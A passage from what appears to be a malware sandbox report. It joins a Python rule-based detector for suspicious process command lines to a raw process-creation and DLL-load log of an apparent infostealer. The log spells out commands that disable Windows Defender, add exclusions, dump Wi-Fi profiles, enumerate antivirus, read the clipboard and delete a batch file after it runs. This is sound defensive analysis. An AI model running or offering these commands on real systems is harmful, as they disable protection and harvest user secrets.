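    ("av_enum_wmi", r"securitycenter2.*antivirusproduct"),
    ("host_recon",
     r"^(?:tasklist|systeminfo|getmac|tree)(?:\.exe|\.com)?\b|get-clipboard"),
    ("runtime_pip_install", r"-m\s+pip\s+install\b"),
    ("self_deleting_batch", r"\.bat\s*&\s*del\s"),
]
COMPILED = [(name, re.compile(rx, re.I)) for name, rx in RULES]

# Binaries with these names belong under the system directories only.
SYSTEM_NAMES = {"svchost.exe", "conhost.exe", "cmd.exe", "powershell.exe", "mshta.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed sample: twelve entries copied from this report, in its own shape.
SAMPLE = r"""
Source: unknown | Process created: C:\Users\user\Desktop\DevxExecutor.exe "C:\Users\user\Desktop\DevxExecutor.exe"
Source: C:\Users\user\Desktop\DevxExecutor.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\ProgramData\main.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
"""


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse(lines):
    """Yield one event per well-formed evidence line; other lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield {"parent": m["parent"], "image": m["image"], "cmdline": m["cmdline"]}


def masquerading(image):
    """True when a system binary name sits outside System32/SysWOW64."""
    low = image.lower()
    return basename(low) in SYSTEM_NAMES and not low.startswith(SYSTEM_DIRS)


def analyse(lines):
    """Return one finding per (rule, event) pair that fired."""
    findings = []
    for ev in parse(lines):
        for name, rx in COMPILED:
            if rx.search(ev["cmdline"]):
                findings.append({"rule": name, **ev})
        if masquerading(ev["image"]):
            findings.append({"rule": "system_name_outside_system_dir", **ev})
    return findings


def spawn_map(lines):
    """Map each parent basename to the sorted basenames it spawned."""
    tree = defaultdict(set)
    for ev in parse(lines):
        tree[basename(ev["parent"])].add(basename(ev["image"]))
    return {parent: sorted(children) for parent, children in tree.items()}


if __name__ == "__main__":
    for f in analyse(SAMPLE.strip().splitlines()):
        print(f"{f['rule']:<32} {basename(f['parent'])} -> {f['image']}")
```

The rules are anchored on the child process's own command line, so a cmd.exe /c wrapper and the LOLBin it launches do not both fire for the same recon command; the conhost.exe line in the sample produces no finding, which is the intended baseline. Parents are keyed by image path rather than PID, because that is all these evidence lines carry, so a binary that re-launches itself (cstealer.exe, based.exe) appears as its own child in the spawn map.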
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe"
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Process created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Process created: C:\Users\user\AppData\Local\Temp\main.exe "C:\Users\user\AppData\Local\Temp\main.exe"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\Microsoft\hacn.exe | Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()""
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [encoded command omitted]
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\ProgramData\Microsoft\based.exe | Process created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\ProgramData\Microsoft\hacn.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\ProgramData\main.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\ProgramData\svchost.exe | Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                Source: C:\ProgramData\setup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                Source: C:\ProgramData\setup.exe | Process created: unknown unknown
                                Source: C:\ProgramData\setup.exe | Process created: unknown unknown
                                Source: C:\ProgramData\setup.exe | Process created: unknown unknown
                                Source: C:\ProgramData\setup.exe | Process created: unknown unknown
                                Source: C:\ProgramData\setup.exe | Process created: unknown unknown
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: C:\Users\user\AppData\Local\Temp\cstealer.exe "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
                                Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 7796"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: mscoree.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: apphelp.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: version.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: cryptsp.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: rsaenh.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: cryptbase.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: windows.storage.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: wldp.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: propsys.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: profapi.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: edputil.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: urlmon.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: iertutil.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: srvcli.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: netutils.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: sspicli.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: appresolver.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: bcp47langs.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: slc.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: userenv.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: sppc.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\Desktop\DevxExecutor.exe | Section loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: vcruntime140.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: python3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: libffi-8.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: libcrypto-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: libssl-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: sqlite3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Section loaded: vcruntime140.dll
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Section loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\main.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: vcruntime140.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: python3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: libffi-8.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: libcrypto-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: libssl-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: sqlite3.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Section loaded: wintypes.dll
                                Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: dxgidebug.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: sfc_os.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: dwmapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: riched20.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: usp10.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: msls31.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: dpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: windowscodecs.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: textinputframework.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: coreuicomponents.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: ntmarta.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: coremessaging.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: appresolver.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: bcp47langs.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: slc.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: sppc.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Section loaded: apphelp.dll
